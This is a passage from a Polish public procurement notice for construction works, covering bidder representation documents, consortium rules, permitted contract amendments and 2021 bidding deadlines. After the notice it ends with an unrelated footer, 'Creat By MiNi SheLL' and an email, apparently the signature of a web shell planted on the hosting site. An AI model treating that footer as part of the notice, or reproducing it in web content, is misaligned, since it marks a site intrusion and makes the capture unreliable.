udostępniających zasoby na zasadach określonych w art. 118 ustawy oraz podwykonawcy niebędącego podmiotem udostępniającym zasoby (o ile jest już znany). <br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. W przypadku wskazania dostępności powyższych dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Wykonawca przedstawia tłumaczenie tych dokumentów na język polski.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów. <br/>Jeżeli w imieniu wykonawcy, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby (o ile jest już znany) działa osoba, której umocowanie do jego reprezentowania nie wynika z wymaganych dokumentów, zamawiający może żądać odpowiednio od każdego ze wskazanych podmiotów pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania.<br/>3.	Do oferty Wykonawca zobowiązany jest dołączyć pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w jego imieniu działa osoba, której umocowanie do reprezentowania Wykonawcy nie wynika z dokumentów, o których mowa w pkt. 2. <br/>W sytuacji Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty Wykonawcy zobowiązani są dołączyć pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, podpisane odpowiednio przez osoby umocowane do reprezentowania tych Wykonawców. <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym także spółki cywilne), w oparciu o art. 117 ust. 4 ustawy Pzp dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy – Załącznik nr 3 do SWZ.<br/>5.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – Załącznik nr 4 do SWZ.<br/>6.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia do oferty, wraz z oświadczeniem, o którym mowa w pkt. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego zasoby – Załącznik nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty zgodnie z zapisami rozdziału X ust. A pkt. 3 niniejszej SWZ.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w rozdziale X ust. A pkt. 1 niniejszej SWZ, składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie o którym mowa w rozdziale X ust. A pkt. 4 niniejszej SWZ, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy, zgodnie z art. 117 ust. 4<br/>ustawy Pzp.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w rozdziale X ust. B pkt. 1 ppkt. 1) niniejszej SWZ, składa każdy z<br/>Wykonawców.<br/>5. Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu<br/>Wykonawcy wspólnie ubiegający się o zamówienie składają z zastrzeżeniem art. 117 ust. 3<br/>ustawy Pzp, tj. „W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane” – co winno mieć odzwierciedlenie w<br/>oświadczeniu składanym zgodnie z art. 117 ust. 4 ustawy Pzp.<br/>6. Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 ustawy Pzp, dotyczy<br/>również wykonawców, prowadzących działalność w formie spółki cywilnej. Zgodnie z opinią<br/>Urzędu Zamówień Publicznych na gruncie przepisów dotyczących zamówień publicznych<br/>przedsiębiorców, prowadzących działalność w formie spółki cywilnej należy bowiem traktować<br/>jak wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Dopuszcza się zmianę zapisów umownych stanowiących oczywistą omyłkę.<br/>2) Termin realizacji zamówienia może ulec zmianie w drodze obustronnie podpisanego aneksu<br/>w przypadku:<br/>a) wystąpienia, potwierdzonych wydrukami synoptycznymi, niekorzystnych warunków<br/>atmosferycznych uniemożliwiających wykonywanie prac zgodnie z wymaganiami technologii:<br/>temperatur poniżej 0°C, intensywnych opadów deszczu, gradu występujących powyżej 3 dni<br/>roboczych. Termin realizacji zamówienia zostanie wydłużony o ilość dni występujących<br/>niekorzystnych warunków atmosferycznych,<br/>b) zmiany zakresu rzeczowego robót dokonanego przez Zamawiającego, w trakcie realizacji<br/>prac lub z przyczyn niezależnych od Wykonawcy tzw. sił wyższych rozumianych jako:<br/>wydarzenie lub okoliczność o charakterze nadzwyczajnym, na którą Wykonawca ani<br/>Zamawiający nie mają wpływu; wystąpieniu której Wykonawca ani Zamawiający, działając<br/>racjonalnie, nie mogli zapobiec przed zawarciem Umowy; której, w przypadku jej wystąpienia,<br/>Wykonawca ani Zamawiający, działając racjonalnie, nie mogli uniknąć lub jej przezwyciężyć;<br/>oraz która nie może być zasadniczo przypisana Wykonawcy ani Zamawiającemu.<br/>3) Zamawiający przewiduje możliwość dokonania zmiany umowy o udzielenie zamówienia<br/>publicznego na realizację przedmiotowego zadania w zakresie osób wskazanych w umowie, w<br/>sytuacji zaistnienia konieczności zmiany przedstawicieli Zamawiającego lub/i Wykonawcy<br/>odpowiedzialnych za realizację zobowiązań stron w okresie trwania umowy lub gwarancji.<br/>Zmiana taka wymaga wyłącznie pisemnego powiadomienia drugiej strony umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com